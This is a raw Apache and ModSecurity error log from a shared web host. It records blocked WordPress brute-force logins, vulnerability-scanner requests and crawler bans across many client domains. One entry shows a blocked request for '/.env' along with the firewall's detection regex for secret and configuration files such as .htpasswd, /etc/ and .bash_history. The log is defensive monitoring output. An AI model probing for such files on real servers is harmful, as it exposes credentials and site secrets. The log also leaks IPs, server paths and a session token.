[Tue May 26 19:24:03.441945 2026] [core:crit] [pid 37506:tid 37662] (13)Permission denied: [client 52.167.144.161:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 19:24:05.001638 2026] [security2:error] [pid 37506:tid 37755] [client 57.141.2.18:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWl_AKctTPx5f8aOzkxgwAAAHc"]
[Tue May 26 19:24:05.355899 2026] [security2:error] [pid 37506:tid 37714] [client 66.146.235.34:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWl_QKctTPx5f8aOzkxnQAAAE4"], referer: https://www.anujtradingco.com/
[Tue May 26 19:24:06.153582 2026] [security2:error] [pid 37506:tid 37649] [client 102.164.188.174:26168] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "erp.azurmediatec.com"] [uri "/salaries/payment_salary/card.php"] [unique_id "ahWl_gKctTPx5f8aOzkxsgAADT8"], referer: https://erp.azurmediatec.com/salaries/payment_salary/card.php?id=29&action=delete&token=f37c35c9de3ddfad11d25aef7fc4c9c6
[Tue May 26 19:24:06.465097 2026] [security2:error] [pid 37506:tid 37712] [client 57.141.2.41:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWl_gKctTPx5f8aOzkxqwAAAEw"]
[Tue May 26 19:24:06.976793 2026] [security2:error] [pid 37506:tid 37658] [client 66.146.235.34:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWl_gKctTPx5f8aOzkxywAAABY"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1267370&moderation-hash=2312169d341601e7204dfd8ea02c61c0
[Tue May 26 19:24:07.415963 2026] [lsapi:error] [pid 37506:tid 37560] [remote 102.164.188.174:26168] [host erp.azurmediatec.com] Request retrieving failed. Reason: unknown, On: request body, Source: client, Where: unknown, referer: https://erp.azurmediatec.com/salaries/payment_salary/card.php?id=29&action=delete&token=f37c35c9de3ddfad11d25aef7fc4c9c6
[Tue May 26 19:24:07.415980 2026] [lsapi:error] [pid 37506:tid 37560] [remote 102.164.188.174:26168] [host erp.azurmediatec.com] In order to get more info about fail reason try to change LogLevel to Info in httpd.conf and restart Apache, referer: https://erp.azurmediatec.com/salaries/payment_salary/card.php?id=29&action=delete&token=f37c35c9de3ddfad11d25aef7fc4c9c6
[Tue May 26 19:24:07.415995 2026] [lsapi:error] [pid 37506:tid 37560] [remote 102.164.188.174:26168] [host erp.azurmediatec.com] Client error on sending request(POST /core/ajax/check_notifications.php HTTP/2.0); uri(/core/ajax/check_notifications.php) content-length(114): user_get_body(tmpstackbuf, 16384): read from client failed, referer: https://erp.azurmediatec.com/salaries/payment_salary/card.php?id=29&action=delete&token=f37c35c9de3ddfad11d25aef7fc4c9c6
[Tue May 26 19:24:08.626767 2026] [security2:error] [pid 37506:tid 37559] [remote 216.73.217.110:7607] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 110.217.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "rainadelproperties.com"] [uri "/online.php"] [unique_id "ahWmAAKctTPx5f8aOzkx-wAAPDQ"]
[Tue May 26 19:24:09.264452 2026] [security2:error] [pid 37506:tid 37679] [client 57.141.2.12:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWmAAKctTPx5f8aOzkyCQAAACs"]
[Tue May 26 19:24:11.368773 2026] [security2:error] [pid 37506:tid 37675] [client 66.146.235.34:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWmAwKctTPx5f8aOzkyWAAAACc"], referer: https://anujtradingco.com
[Tue May 26 19:24:11.665760 2026] [security2:error] [pid 37506:tid 37693] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWmAwKctTPx5f8aOzkyTAAAADk"]
[Tue May 26 19:24:13.753764 2026] [security2:error] [pid 37506:tid 37746] [client 57.141.2.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWmBQKctTPx5f8aOzkyqwAAAG4"]
[Tue May 26 19:24:15.453614 2026] [security2:error] [pid 37506:tid 37682] [client 57.141.2.14:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWmBwKctTPx5f8aOzky2QAAAC4"]
[Tue May 26 19:24:17.592010 2026] [security2:error] [pid 37506:tid 37591] [remote 112.196.0.228:45650] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 228.0.196.112.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWmCQKctTPx5f8aOzkzHwAAVFQ"]
[Tue May 26 19:24:17.705596 2026] [security2:error] [pid 37506:tid 37718] [client 57.141.2.8:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWmCQKctTPx5f8aOzkzGwAAAFI"]
[Tue May 26 19:24:18.206131 2026] [security2:error] [pid 37506:tid 37507] [remote 112.196.0.228:45650] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 228.0.196.112.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWmCgKctTPx5f8aOzkzNgAAXQA"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 19:24:20.543089 2026] [security2:error] [pid 37506:tid 37518] [remote 78.142.18.172:40448] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 172.18.142.78.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWmDAKctTPx5f8aOzkzeAAAYAs"]
[Tue May 26 19:24:20.770937 2026] [security2:error] [pid 37506:tid 37677] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWmDAKctTPx5f8aOzkzdwAAACk"]
[Tue May 26 19:24:20.780094 2026] [security2:error] [pid 37506:tid 37517] [remote 78.142.18.172:40448] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 172.18.142.78.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWmDAKctTPx5f8aOzkzfAAADQo"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 19:24:22.294818 2026] [security2:error] [pid 37506:tid 37690] [client 57.141.2.35:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWmDQKctTPx5f8aOzkzpQAAADY"]
[Tue May 26 19:24:22.351993 2026] [security2:error] [pid 37506:tid 37521] [remote 103.91.67.202:33810] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 202.67.91.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWmDgKctTPx5f8aOzkzsQAADA4"]
[Tue May 26 19:24:23.983515 2026] [security2:error] [pid 37506:tid 37564] [remote 162.241.152.21:36956] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 21.152.241.162.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWmDwKctTPx5f8aOzk0AAAAXzk"]
[Tue May 26 19:24:24.678464 2026] [security2:error] [pid 37506:tid 37573] [remote 141.138.139.98:57916] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 98.139.138.141.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "poonawallatennisacademy.moes-art.com"] [uri "/wp-login.php"] [unique_id "ahWmEAKctTPx5f8aOzk0FAAAOkI"]
[Tue May 26 19:24:24.842873 2026] [security2:error] [pid 37506:tid 37653] [client 40.77.167.116:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "theafterglow-centre.com"] [uri "/index.php"] [unique_id "ahWmEAKctTPx5f8aOzk0FwAAABE"]
[Tue May 26 19:24:24.896385 2026] [security2:error] [pid 37506:tid 37681] [client 57.141.2.24:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWmEAKctTPx5f8aOzk0EwAAAC0"]
[Tue May 26 19:24:25.384087 2026] [http2:info] [pid 49598:tid 49598] h2_workers: created with min=128 max=192 idle_ms=600000
[Tue May 26 19:24:25.903949 2026] [lsapi:error] [pid 37506:tid 37560] [remote 102.164.188.174:20460] [host erp.azurmediatec.com] Request retrieving failed. Reason: unknown, On: request body, Source: client, Where: unknown, referer: https://erp.azurmediatec.com/salaries/card.php?action=create&fk_project=0&accountid=1&paymenttype=2&datepday=18&datepmonth=3&datepyear=2026
[Tue May 26 19:24:25.903968 2026] [lsapi:error] [pid 37506:tid 37560] [remote 102.164.188.174:20460] [host erp.azurmediatec.com] In order to get more info about fail reason try to change LogLevel to Info in httpd.conf and restart Apache, referer: https://erp.azurmediatec.com/salaries/card.php?action=create&fk_project=0&accountid=1&paymenttype=2&datepday=18&datepmonth=3&datepyear=2026
[Tue May 26 19:24:25.903972 2026] [lsapi:error] [pid 37506:tid 37560] [remote 102.164.188.174:20460] [host erp.azurmediatec.com] Client error on sending request(POST /core/ajax/check_notifications.php HTTP/2.0); uri(/core/ajax/check_notifications.php) content-length(114): user_get_body(tmpstackbuf, 16384): read from client failed, referer: https://erp.azurmediatec.com/salaries/card.php?action=create&fk_project=0&accountid=1&paymenttype=2&datepday=18&datepmonth=3&datepyear=2026
[Tue May 26 19:24:26.416018 2026] [security2:error] [pid 49598:tid 49785] [client 114.119.156.102:27813] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "toronto121mortgage.com"] [uri "/upload/files/96273-kupit-loravit-sredstvo-dlya-vosstanovleniya-sluha-v-chernigove.xml"] [unique_id "ahWmEuzJzkdc0Wtdrws_qgAAAL4"], referer: http://vimejakusetrit.cz/files/41089-kupit-loravit-sredstvo-dlya-vosstanovleniya-sluha-v-krasnogorske.xml
[Tue May 26 19:24:26.762517 2026] [security2:error] [pid 49598:tid 49794] [client 57.141.2.31:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWmEuzJzkdc0Wtdrws_pgAAAMc"]
[Tue May 26 19:24:27.030237 2026] [security2:error] [pid 49598:tid 49685] [remote 74.7.241.58:57260] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/"] [unique_id "ahWmE-zJzkdc0Wtdrws_wwAA5FY"], referer: https://www.billing.mosykay.com/?path=/home1/taote1zo/public_html/shop/wp-content/plugins/woocommerce/templates/cart
[Tue May 26 19:24:27.658195 2026] [security2:error] [pid 49598:tid 49602] [remote 66.116.199.98:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 98.199.116.66.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "kingsclub.in"] [uri "/wp-login.php"] [unique_id "ahWmE-zJzkdc0Wtdrws_xwAA7QM"]
[Tue May 26 19:24:29.228531 2026] [security2:error] [pid 49598:tid 49781] [client 5.9.120.88:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWmFezJzkdc0Wtdrws_8wAAALo"]
[Tue May 26 19:24:29.704820 2026] [security2:error] [pid 49598:tid 49773] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWmFezJzkdc0Wtdrws_-AAAALI"]
[Tue May 26 19:24:29.834131 2026] [security2:error] [pid 49598:tid 49770] [client 5.9.120.88:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWmFezJzkdc0WtdrwtABQAAAK8"]
[Tue May 26 19:24:30.606421 2026] [security2:error] [pid 49598:tid 49853] [client 114.119.135.84:65409] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.anujtradingco.com"] [uri "/top-deejay-headphones/"] [unique_id "ahWmFuzJzkdc0WtdrwtAIgAAAQI"], referer: https://premiumproxy.net/check-headers-status/GET/http:/www.roovet.com/articles/user:sunnytfp697
[Tue May 26 19:24:31.188239 2026] [security2:error] [pid 49598:tid 49726] [remote 162.241.152.21:46358] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 21.152.241.162.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWmF-zJzkdc0WtdrwtANQAAvX8"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 19:24:31.636942 2026] [security2:error] [pid 49598:tid 49617] [remote 193.42.61.12:50480] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 12.61.42.193.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "rohiniventures.com"] [uri "/wp-login.php"] [unique_id "ahWmF-zJzkdc0WtdrwtAOwAAwhI"]
[Tue May 26 19:24:31.888847 2026] [security2:error] [pid 49598:tid 49787] [client 57.141.2.4:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWmF-zJzkdc0WtdrwtAPgAAAMA"]
[Tue May 26 19:24:33.394326 2026] [security2:error] [pid 49598:tid 49624] [remote 102.164.188.174:3742] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "erp.azurmediatec.com"] [uri "/salaries/card.php"] [unique_id "ahWmGezJzkdc0WtdrwtAcQAA5xk"], referer: https://erp.azurmediatec.com/salaries/card.php?action=delete&token=f37c35c9de3ddfad11d25aef7fc4c9c6&id=27
[Tue May 26 19:24:34.003465 2026] [security2:error] [pid 49598:tid 49626] [remote 193.42.61.12:50480] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 12.61.42.193.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "rohiniventures.com"] [uri "/wp-login.php"] [unique_id "ahWmGezJzkdc0WtdrwtAhwAA7Bs"], referer: https://rohiniventures.com/wp-login.php
[Tue May 26 19:24:34.180221 2026] [security2:error] [pid 49598:tid 49789] [client 57.141.2.66:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWmGezJzkdc0WtdrwtAgQAAAMI"]
[Tue May 26 19:24:36.285067 2026] [security2:error] [pid 49598:tid 49841] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWmG-zJzkdc0WtdrwtAvgAAAPY"]
[Tue May 26 19:24:36.637730 2026] [security2:error] [pid 49598:tid 49822] [client 74.7.244.49:0] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "gldmarsa.com"] [uri "/cgi-sys/404.html"] [unique_id "ahWmHOzJzkdc0WtdrwtA1AAAAOM"]
[Tue May 26 19:24:36.638388 2026] [security2:error] [pid 49598:tid 49757] [client 74.7.244.49:41902] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "gldmarsa.com"] [uri "/robots.txt"] [unique_id "ahWmHOzJzkdc0WtdrwtA0gAAoiA"]
[Tue May 26 19:24:36.738232 2026] [autoindex:error] [pid 49598:tid 49730] [client 74.7.241.59:0] AH01276: Cannot serve directory /home2/glorolle/public_html/gldmarsa.com/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 19:24:37.125002 2026] [security2:error] [pid 49598:tid 49728] [client 176.65.139.239:47170] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "rakeshdewan.moes-art.com"] [uri "/.env"] [unique_id "ahWmHezJzkdc0WtdrwtA7gAAAIU"]
[Tue May 26 19:24:37.419691 2026] [security2:error] [pid 49598:tid 49642] [remote 62.181.233.16:44644] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 16.233.181.62.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "moes-art.com"] [uri "/wp-login.php"] [unique_id "ahWmHezJzkdc0WtdrwtA6wABASs"]
[Tue May 26 19:24:38.135746 2026] [security2:error] [pid 49598:tid 49799] [client 57.141.2.62:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWmHezJzkdc0WtdrwtA_QAAAMw"]
[Tue May 26 19:24:40.399131 2026] [security2:error] [pid 49598:tid 49769] [client 222.253.202.186:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWmH-zJzkdc0WtdrwtBNgAAAK4"]
[Tue May 26 19:24:41.019937 2026] [security2:error] [pid 49598:tid 49815] [client 85.208.96.204:59738] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/tag/july-21-25/list/"] [unique_id "ahWmIezJzkdc0WtdrwtBUgAAANw"]
[Tue May 26 19:24:41.020076 2026] [security2:error] [pid 49598:tid 49815] [client 85.208.96.204:59738] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/tag/july-21-25/list/"] [unique_id "ahWmIezJzkdc0WtdrwtBUgAAANw"]
[Tue May 26 19:24:41.484310 2026] [security2:error] [pid 49598:tid 49789] [client 57.141.2.13:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWmIezJzkdc0WtdrwtBWAAAAMI"]
[Tue May 26 19:24:41.587990 2026] [security2:error] [pid 49598:tid 49654] [remote 216.73.216.30:8206] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/"] [unique_id "ahWmIezJzkdc0WtdrwtBagAA7Dc"]
[Tue May 26 19:24:41.654980 2026] [fcgid:warn] [pid 49598:tid 49820] (70014)End of file found: [client 167.94.146.51:59296] mod_fcgid: can't get data from http client
[Tue May 26 19:24:43.483483 2026] [security2:error] [pid 49598:tid 49655] [remote 103.216.118.192:38980] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 192.118.216.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWmI-zJzkdc0WtdrwtBnQAAtjg"]
[Tue May 26 19:24:43.786530 2026] [security2:error] [pid 49598:tid 49818] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWmI-zJzkdc0WtdrwtBnAAAAN8"]
[Tue May 26 19:24:44.212912 2026] [security2:error] [pid 49598:tid 49659] [remote 167.71.130.119:46142] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.130.71.167.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWmJOzJzkdc0WtdrwtBrQAA9Dw"]
[Tue May 26 19:24:45.239651 2026] [security2:error] [pid 49598:tid 49738] [client 119.23.78.59:65392] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 59.78.23.119.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "www.cagmedya.com"] [uri "/wp-login.php"] [unique_id "ahWmJOzJzkdc0WtdrwtBxgAAAI8"], referer: https://www.cagmedya.com/
[Tue May 26 19:24:45.442038 2026] [security2:error] [pid 49598:tid 49803] [client 57.141.2.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWmJezJzkdc0WtdrwtBzQAAANA"]
